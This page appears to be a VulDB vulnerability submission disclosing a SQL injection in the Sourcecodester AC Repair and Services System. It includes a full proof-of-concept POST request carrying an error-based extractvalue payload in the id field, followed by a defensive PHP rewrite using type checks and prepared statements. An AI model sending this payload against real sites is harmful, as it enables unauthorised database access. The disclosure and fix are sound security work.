Submission #180767: Sourcecodester Ac Repair And Services System HTTP POST Request sql injection
Information

Title: Sourcecodester Ac Repair And Services System HTTP POST Request sql injection
Description:
I found a SQL injection in Sourcecodester Ac Repair And Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). It is a SQL injection in url/classes/Master.php?f=save_service.

POST /php-acrss/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------263926565035055952363112430264
Content-Length: 845
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=services/manage_service
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="id"

1 or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="name"

111
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="price"

111
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="description"

<p>1111</p>
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="image"; filename=""
Content-Type: image/png

-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="status"

1
-----------------------------263926565035055952363112430264--

My suggestion for modification is to use mysqli_real_escape_string() to protect the controllable id parameter from malicious exploitation by hackers resulting in SQL error-based injection.
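The submitted request places the `id` form field into an SQL statement without type checking, so a non-numeric value is accepted as part of the query. A defensive note for anyone fixing this class of bug: the payload above contains no quote characters, and quote-escaping functions do not change an unquoted numeric context, so the reliable remediation is to validate the type of `id` and bind every value through a prepared statement. The following handler is an added example written for this page; it is not code from the Sourcecodester project, and the table name `service_list`, the column names and the `save_service` function name are assumptions about how such a handler might be laid out.

```php
<?php
// Added example, not the project's own code. Table and column names are assumed.
// Make mysqli throw exceptions instead of silently continuing, and never echo
// the driver's error text to the client: error-based extraction (the
// extractvalue() trick in the report) depends on seeing that text.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Insert or update a service row from the submitted form fields.
 * Returns the affected row's id, or throws on invalid input / DB failure.
 */
function save_service(mysqli $db, array $post): int
{
    // id must be an integer; "1 or (extractvalue(...))#" fails this check outright.
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false || $id < 0) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }

    $name        = trim((string)($post['name'] ?? ''));
    $price       = filter_var($post['price'] ?? '', FILTER_VALIDATE_FLOAT);
    $description = (string)($post['description'] ?? '');
    $status      = filter_var($post['status'] ?? '', FILTER_VALIDATE_INT);

    if ($name === '' || $price === false || $status === false) {
        throw new InvalidArgumentException('name, price and status are required');
    }

    if ($id === 0) {
        // New record: all values bound as parameters, none concatenated into SQL.
        $stmt = $db->prepare(
            'INSERT INTO service_list (name, price, description, status) VALUES (?, ?, ?, ?)'
        );
        $stmt->bind_param('sdsi', $name, $price, $description, $status);
        $stmt->execute();
        $newId = (int)$db->insert_id;
        $stmt->close();
        return $newId;
    }

    // Existing record: the id reaches the WHERE clause only as a bound integer.
    $stmt = $db->prepare(
        'UPDATE service_list SET name = ?, price = ?, description = ?, status = ? WHERE id = ?'
    );
    $stmt->bind_param('sdsii', $name, $price, $description, $status, $id);
    $stmt->execute();
    $stmt->close();
    return $id;
}

// Usage sketch (assumed DSN values): wrap in try/catch so that a mysqli_sql_exception
// is logged server-side and the client receives only a generic failure message.
// $db = new mysqli('localhost', 'user', 'pass', 'acrss_db');
// try { echo json_encode(['status' => 'success', 'id' => save_service($db, $_POST)]); }
// catch (Throwable $e) { error_log($e->getMessage()); echo json_encode(['status' => 'failed']); }
```

The type check on `id` is what stops the request shown in the report; the prepared statement is what stops every other variant, and the exception/logging pattern removes the error-message channel that error-based injection relies on.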
Source: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submission: 11/07/2023 03:05 PM (3 years ago)
Moderation: 11/07/2023 04:50 PM (2 hours later)
Status: Accepted
VulDB Entry: 233573 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=save_service SQL injection]
Points: 20
